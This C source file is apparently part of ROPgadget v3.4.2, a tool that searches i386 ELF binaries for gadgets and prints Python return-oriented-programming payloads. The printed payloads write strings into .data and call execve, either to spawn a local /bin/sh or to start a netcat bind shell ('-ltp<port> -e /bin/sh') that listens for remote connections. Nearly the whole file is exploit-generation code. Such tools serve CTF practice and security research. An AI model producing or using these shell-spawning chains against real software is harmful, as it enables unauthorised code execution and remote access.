/*
** partie 3 : load the execve syscall number into %eax.
** Emits "xor %eax,%eax" once, then "inc %eax" eleven times (0xb is the
** i386 __NR_execve, as the original comment states), each line followed
** by the padding its gadget needs.
*/
static void makepartie3(t_makecode *list_ins)
{
  const int execve_nr = 0xb;
  Elf32_Addr addr_xor_eax = ret_addr_makecodefunc(list_ins, "xor %eax,%eax");
  Elf32_Addr addr_inc_eax = ret_addr_makecodefunc(list_ins, "inc %eax");
  char *xor_eax_gadget = get_gadget_since_addr_att(addr_xor_eax);
  char *inc_eax_gadget = get_gadget_since_addr_att(addr_inc_eax);
  int step;

  /* %eax = 0 */
  fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_xor_eax, xor_eax_gadget, ENDC);
  display_padding(how_many_pop(xor_eax_gadget));
  /* %eax = 0xb, one "inc %eax" gadget per unit */
  for (step = 0; step < execve_nr; step++)
    {
      fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_inc_eax, inc_eax_gadget, ENDC);
      display_padding(how_many_pop(inc_eax_gadget));
    }
}
/*
** Emit a "pop %<reg>" gadget followed by the value it pops, each with
** the padding required by the pops before / after the one we use.
** value_comment is the text printed after "# " on the value line.
*/
static void p2_load_reg(Elf32_Addr addr_pop, char *pop_gadget, char *pop_instr, Elf32_Addr value, char *value_comment)
{
  fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop, pop_gadget, ENDC);
  display_padding(how_many_pop_before(pop_gadget, pop_instr));
  fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, value, value_comment, ENDC);
  display_padding(how_many_pop_after(pop_gadget, pop_instr));
}

/*
** partie 2 bis : execve() argument registers for the bind-shell chain.
**   %ebx = .data      (the "//usr/bin/netcat" string written by partie 1 bis)
**   %ecx = .data + 40 (the argv[] table written by partie 1 bis)
**   %edx = .data + 52 (the NULL that terminates argv[], used as envp)
*/
static void makepartie2_remote(t_makecode *list_ins)
{
  Elf32_Addr addr_pop_ebx = ret_addr_makecodefunc(list_ins, "pop %ebx");
  Elf32_Addr addr_pop_ecx = ret_addr_makecodefunc(list_ins, "pop %ecx");
  Elf32_Addr addr_pop_edx = ret_addr_makecodefunc(list_ins, "pop %edx");
  char *pop_ebx_gadget = get_gadget_since_addr_att(addr_pop_ebx);
  char *pop_ecx_gadget = get_gadget_since_addr_att(addr_pop_ecx);
  char *pop_edx_gadget = get_gadget_since_addr_att(addr_pop_edx);

  p2_load_reg(addr_pop_ebx, pop_ebx_gadget, "pop %ebx", Addr_sData, "@ .data");
  p2_load_reg(addr_pop_ecx, pop_ecx_gadget, "pop %ecx", Addr_sData + 40, "@ .data + 40");
  p2_load_reg(addr_pop_edx, pop_edx_gadget, "pop %edx", Addr_sData + 52, "@ .data + 52");
}
/*
** Combo 1 (execve): check that every instruction of tab_combo_ropsh2 has
** a gadget, list them (found ones in green, missing ones in red), then
** hand the collected list to makecode() when nothing is missing.
*/
void combo_ropmaker2(void)
{
  int missing = 0;
  int idx;
  t_makecode *list_ins = NULL;

  /* first pass: is the whole combo available? */
  for (idx = 0; tab_combo_ropsh2[idx].instruction; idx++)
    {
      if (search_instruction(tab_combo_ropsh2[idx].instruction) == 0)
        {
          missing = 1;
          break;
        }
    }
  if (missing)
    fprintf(stderr, "[%s-%s] Combo 1 was not found, missing instruction(s).\n", RED, ENDC);
  else
    fprintf(stdout, "[%s+%s] Combo 1 was found - Possible with the following gadgets. (execve)\n", GREEN, ENDC);
  /* second pass: report every instruction, collect gadgets only for a complete combo */
  for (idx = 0; tab_combo_ropsh2[idx].instruction; idx++)
    {
      Elf32_Addr addr = search_instruction(tab_combo_ropsh2[idx].instruction);

      if (!addr)
        {
          fprintf(stdout, "\t- %s..........%s => %s%s%s\n", RED, ENDC, RED, tab_combo_ropsh2[idx].instruction, ENDC);
          continue;
        }
      fprintf(stdout, "\t- %s0x%.8x%s => %s%s%s\n", GREEN, addr, ENDC, GREEN, get_gadget_since_addr(addr), ENDC);
      if (!missing)
        list_ins = add_element(list_ins, get_gadget_since_addr_att(addr), addr);
    }
  fprintf(stdout, "\t- %s0x%.8x%s => %s.data Addr%s\n", GREEN, Addr_sData, ENDC, GREEN, ENDC);
  /* build the python code */
  if (!missing)
    makecode(list_ins);
}
/*
** partie 4 : enter the kernel. Prefers an "int $0x80" gadget; otherwise
** uses "sysenter", preceded by "pop %ebp" loaded with the .data address
** (the original's sysenter sequence, reproduced as is). If neither
** gadget is in list_ins nothing is emitted -- presumably the combo check
** in the caller already guarantees one of them exists (not verified here).
*/
static void makepartie4(t_makecode *list_ins)
{
  Elf32_Addr addr_int_0x80 = ret_addr_makecodefunc(list_ins, "int $0x80");
  Elf32_Addr addr_sysenter = ret_addr_makecodefunc(list_ins, "sysenter");
  Elf32_Addr addr_pop_ebp = ret_addr_makecodefunc(list_ins, "pop %ebp");
  char *pop_ebp_gadget = get_gadget_since_addr_att(addr_pop_ebp);

  if (addr_int_0x80)
    {
      fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # int $0x80%s\n", BLUE, addr_int_0x80, ENDC);
      return;
    }
  if (!addr_sysenter)
    return;
  fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_ebp, pop_ebp_gadget, ENDC);
  fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data %s\n", BLUE, Addr_sData, ENDC);
  fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # sysenter%s\n", BLUE, addr_sysenter, ENDC);
}
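/*
** partie 1 / partie 1 bis share one mechanism: write 4 bytes into .data with
**     pop <dst reg> ; pop <val reg> ; mov <val reg>,(<dst reg>)
** (a "xor <val reg>" replaces the second pop when the 4 bytes are zero).
** The gadgets are resolved once into this structure; every helper below
** emits one Python "p += ..." line per chain slot, followed by the padding
** the gadget's extra pops require, exactly like the hand-unrolled original.
*/
typedef struct s_p1_gadgets
{
  Elf32_Addr addr_pop_dst;    /* "pop %<second operand of the mov>" */
  char       *pop_dst_gadget;
  char       pop_dst_instr[32];
  Elf32_Addr addr_pop_val;    /* "pop %<first operand of the mov>" */
  char       *pop_val_gadget;
  char       pop_val_instr[32];
  Elf32_Addr addr_mov;        /* "mov %e?x,(%e?x)" */
  char       *mov_gadget;
  Elf32_Addr addr_xor;        /* "xor %<first operand>..." : zeroes the value reg */
  char       *xor_gadget;
} t_p1_gadgets;

/*
** Resolve the mov / pop / pop / xor gadgets from list_ins into *g.
** Returns 0 on success, -1 when the registers of the mov gadget cannot be
** identified (get_first_reg()/get_second_reg() returned NULL); the original
** would have passed NULL to strncat() in that case.
** Ownership: the two register strings are malloc'd (the original freed
** them) and are released here; the gadget strings are not owned.
*/
static int p1_gadgets_init(t_makecode *list_ins, t_p1_gadgets *g)
{
  char *first_reg;
  char *second_reg;
  char instr_xor[32] = "xor %";

  g->addr_mov = ret_addr_makecodefunc(list_ins, "mov %e?x,(%e?x)");
  g->mov_gadget = get_gadget_since_addr_att(g->addr_mov);
  first_reg = get_first_reg(g->mov_gadget);
  second_reg = get_second_reg(g->mov_gadget);
  if (!first_reg || !second_reg)
    {
      free(first_reg);
      free(second_reg);
      fprintf(stderr, "[%s-%s] Cannot identify the registers of the mov gadget.\n", RED, ENDC);
      return (-1);
    }
  /* destination register = second operand of the mov, value register = first one */
  strcpy(g->pop_dst_instr, "pop %");
  strncat(g->pop_dst_instr, second_reg, 3);
  strcpy(g->pop_val_instr, "pop %");
  strncat(g->pop_val_instr, first_reg, 3);
  strncat(instr_xor, first_reg, 3);
  free(first_reg);
  free(second_reg);
  g->addr_pop_dst = ret_addr_makecodefunc(list_ins, g->pop_dst_instr);
  g->pop_dst_gadget = get_gadget_since_addr_att(g->addr_pop_dst);
  g->addr_pop_val = ret_addr_makecodefunc(list_ins, g->pop_val_instr);
  g->pop_val_gadget = get_gadget_since_addr_att(g->addr_pop_val);
  g->addr_xor = ret_addr_makecodefunc(list_ins, instr_xor);
  /* the original used the non-"_att" lookup for the xor gadget; kept as is */
  g->xor_gadget = get_gadget_since_addr(g->addr_xor);
  return (0);
}

/* One "p += pack("<I", addr) # comment" line. */
static void p1_emit_addr(Elf32_Addr addr, char *comment)
{
  fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr, comment, ENDC);
}

/* The "@ .data" / "@ .data + N" label printed next to a .data address. */
static void p1_data_comment(char *buf, size_t size, unsigned off)
{
  if (off == 0)
    snprintf(buf, size, "@ .data");
  else
    snprintf(buf, size, "@ .data + %u", off);
}

/* Load .data + off into the destination register. */
static void p1_set_dst(t_p1_gadgets *g, unsigned off)
{
  char where[32];

  p1_data_comment(where, sizeof where, off);
  p1_emit_addr(g->addr_pop_dst, g->pop_dst_gadget);
  display_padding(how_many_pop_before(g->pop_dst_gadget, g->pop_dst_instr));
  p1_emit_addr(Addr_sData + off, where);
  display_padding(how_many_pop_after(g->pop_dst_gadget, g->pop_dst_instr));
}

/* Store the 4-byte string chunk (emitted as p += "chunk") at .data + off. */
static void p1_store_chunk(t_p1_gadgets *g, unsigned off, char *chunk)
{
  p1_set_dst(g, off);
  p1_emit_addr(g->addr_pop_val, g->pop_val_gadget);
  display_padding(how_many_pop_before(g->pop_val_gadget, g->pop_val_instr));
  fprintf(stdout, "\t\t%sp += \"%s\"%s\n", BLUE, chunk, ENDC);
  display_padding(how_many_pop_after(g->pop_val_gadget, g->pop_val_instr));
  p1_emit_addr(g->addr_mov, g->mov_gadget);
  display_padding(how_many_pop(g->mov_gadget));
}

/* Store the address .data + target at .data + off (an argv[] entry). */
static void p1_store_data_ptr(t_p1_gadgets *g, unsigned off, unsigned target)
{
  char where[32];

  p1_data_comment(where, sizeof where, target);
  p1_set_dst(g, off);
  p1_emit_addr(g->addr_pop_val, g->pop_val_gadget);
  display_padding(how_many_pop_before(g->pop_val_gadget, g->pop_val_instr));
  p1_emit_addr(Addr_sData + target, where);
  display_padding(how_many_pop_after(g->pop_val_gadget, g->pop_val_instr));
  p1_emit_addr(g->addr_mov, g->mov_gadget);
  display_padding(how_many_pop(g->mov_gadget));
}

/* Store a zeroed register at .data + off (string / argv[] terminator). */
static void p1_store_zero(t_p1_gadgets *g, unsigned off)
{
  p1_set_dst(g, off);
  p1_emit_addr(g->addr_xor, g->xor_gadget);
  display_padding(how_many_pop(g->xor_gadget));
  p1_emit_addr(g->addr_mov, g->mov_gadget);
  display_padding(how_many_pop(g->mov_gadget));
}

/*
** partie 1 bis | write "//usr/bin/netcat" "-ltp<port>" "-e///bin//sh" and
** their argv[] table in .data. Layout (offsets from .data):
**    0  "//usr/bin/netcat\0"
**   17  "-ltp<port>\0"
**   26  "-e///bin//sh\0"
**   40  argv[0] = .data       44  argv[1] = .data + 17
**   48  argv[2] = .data + 26  52  NULL
*/
static void makepartie1_remote(t_makecode *list_ins)
{
  t_p1_gadgets g;

  if (p1_gadgets_init(list_ins, &g) < 0)
    return;
  /* The port is stored as a single 4-byte chunk at .data + 21, so the chain
  ** only lines up when bind_mode.port is exactly 4 characters (e.g. 6666):
  ** a shorter or longer value shifts every following slot. Warn, then emit
  ** the chain unchanged so the output stays what the caller expects. */
  if (strlen(bind_mode.port) != 4)
    fprintf(stderr, "[%s-%s] bind port \"%s\" is not 4 characters, the generated chain will be misaligned.\n", RED, ENDC, bind_mode.port);
  fprintf(stdout, "\t%sPayload%s\n", YELLOW, ENDC);
  fprintf(stdout, "\t\t%s# execve /bin/sh bindport %s generated by RopGadget v3.4.2%s\n", BLUE, bind_mode.port, ENDC);
  /* .data + 0 : "//usr/bin/netcat\0" */
  p1_store_chunk(&g, 0, "//us");
  p1_store_chunk(&g, 4, "r/bi");
  p1_store_chunk(&g, 8, "n/ne");
  p1_store_chunk(&g, 12, "tcat");
  p1_store_zero(&g, 16);
  /* .data + 17 : "-ltp<port>\0" */
  p1_store_chunk(&g, 17, "-ltp");
  p1_store_chunk(&g, 21, bind_mode.port);
  p1_store_zero(&g, 25);
  /* .data + 26 : "-e///bin//sh\0" */
  p1_store_chunk(&g, 26, "-e//");
  p1_store_chunk(&g, 30, "/bin");
  p1_store_chunk(&g, 34, "//sh");
  p1_store_zero(&g, 38);
  /* .data + 40 : argv[] = { .data, .data + 17, .data + 26, NULL } */
  p1_store_data_ptr(&g, 40, 0);
  p1_store_data_ptr(&g, 44, 17);
  p1_store_data_ptr(&g, 48, 26);
  /* The original wrote the NULL as four byte-offset stores (+52..+55); a
  ** 32-bit mov already clears four bytes at +52, so the last three are most
  ** likely redundant, but they are kept so the emitted chain is unchanged. */
  p1_store_zero(&g, 52);
  p1_store_zero(&g, 53);
  p1_store_zero(&g, 54);
  p1_store_zero(&g, 55);
}

/* partie 1 | write "/bin//sh\0" in .data for execve("/bin/sh", NULL, NULL) */
static void makepartie1_local(t_makecode *list_ins)
{
  t_p1_gadgets g;

  if (p1_gadgets_init(list_ins, &g) < 0)
    return;
  fprintf(stdout, "\t%sPayload%s\n", YELLOW, ENDC);
  fprintf(stdout, "\t\t%s# execve /bin/sh generated by RopGadget v3.4.2%s\n", BLUE, ENDC);
  /* .data + 0 : "/bin//sh\0" */
  p1_store_chunk(&g, 0, "/bin");
  p1_store_chunk(&g, 4, "//sh");
  p1_store_zero(&g, 8);
}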